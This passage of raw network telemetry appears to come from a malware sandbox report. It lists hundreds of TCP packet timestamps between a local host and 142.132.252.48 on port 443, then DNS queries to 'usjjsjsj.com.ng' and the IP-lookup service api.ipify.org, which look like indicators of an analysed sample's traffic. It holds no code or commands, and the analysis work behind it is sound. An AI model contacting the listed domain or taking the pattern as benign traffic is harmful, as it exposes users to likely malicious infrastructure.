                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.433690071 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.433706999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.433754921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.433765888 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.433805943 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.439199924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.439220905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.439266920 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.439273119 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.439326048 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.439326048 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.448182106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.448199987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.448256969 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.448263884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.448293924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.453691006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.453706026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.453756094 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.453762054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.453803062 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.458591938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.458609104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.458652973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.458657026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.458700895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.459147930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.463577986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.463594913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.463645935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.463650942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.463709116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.470719099 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.608625889 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.608655930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.608705997 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.608717918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.608764887 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.608859062 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.614510059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.614531994 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.614567041 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.614576101 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.614600897 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.614615917 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.634881020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.634903908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.634941101 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.634951115 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.634983063 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.634996891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.640542030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.640568018 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.640604019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.640610933 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.640654087 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.648483992 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.648504019 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.648561954 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.648575068 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.648626089 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.654205084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.654226065 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.654285908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.654295921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.654333115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.659790039 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.659807920 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.659878016 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.659883976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.659919977 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.664832115 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.664860964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.664912939 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.664920092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.664966106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.667361021 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.810106039 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.810136080 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.810174942 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.810184002 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.810213089 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.810230970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.815773010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.815790892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.815849066 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.815855026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.815896034 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.836252928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.836270094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.836323977 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.836338043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.836375952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.841969013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.841989040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.842036009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.842041969 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.842077971 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.842097998 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.850368977 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.850385904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.850440979 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.850447893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.850497007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.855988979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.856014013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.856050968 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.856057882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.856093884 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.856107950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.861010075 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.861027002 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.861093044 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.861103058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.861150026 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.866604090 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.866621971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.866697073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.866707087 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.866749048 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.867134094 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.011195898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.011223078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.011300087 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.011333942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.011374950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.016922951 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.016951084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.016998053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.017009974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.017045975 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.017055035 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.037606955 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.037632942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.037709951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.037724972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.037770033 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.043399096 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.043425083 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.043464899 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.043472052 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.043498039 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.043513060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.051502943 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.051522017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.051578045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.051609039 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.051656008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.057019949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.057038069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.057087898 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.057095051 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.057120085 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.057128906 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.062846899 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.062865019 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.062926054 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.062935114 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.062980890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.067754030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.067780018 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.067826033 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.067831993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.067862034 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.067876101 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.213036060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.213067055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.213200092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.213221073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.213264942 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.218535900 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.218568087 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.218628883 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.218638897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.218667984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.218683958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.239006996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.239034891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.239090919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.239098072 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.239155054 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.239155054 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.244683981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.244705915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.244766951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.244775057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.244785070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.244822979 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.252778053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.252804041 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.252890110 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.252897024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.252940893 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.258424997 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.258449078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.258533001 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.258538961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.258580923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.264225006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.264250040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.264293909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.264298916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.264341116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.269232988 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.269263983 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.269309044 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.269319057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.269330978 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.269361019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.416023016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.416050911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.416107893 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.416116953 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.416155100 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.416177034 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.421542883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.421567917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.421603918 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.421611071 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.421641111 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.421658993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.440932035 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.440964937 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.441016912 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.441024065 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.441071033 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.445842028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.445875883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.445909977 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.445925951 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.445935011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.445965052 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.454118967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.454148054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.454212904 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.454220057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.454441071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.459702015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.459724903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.459794044 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.459800005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.459868908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.465430021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.465456009 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.465497017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.465502024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.465532064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.465539932 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.470508099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.470532894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.470592022 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.470597982 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.470664978 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.474023104 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.617371082 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.617404938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.617564917 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.617578030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.617624998 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.622895956 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.622922897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.622968912 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.622980118 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.623004913 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.623017073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:21.642285109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:27.402621031 CET192.168.2.61.1.1.10xe7a2Standard query (0)usjjsjsj.com.ngA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:45.960443974 CET192.168.2.61.1.1.10xe95cStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
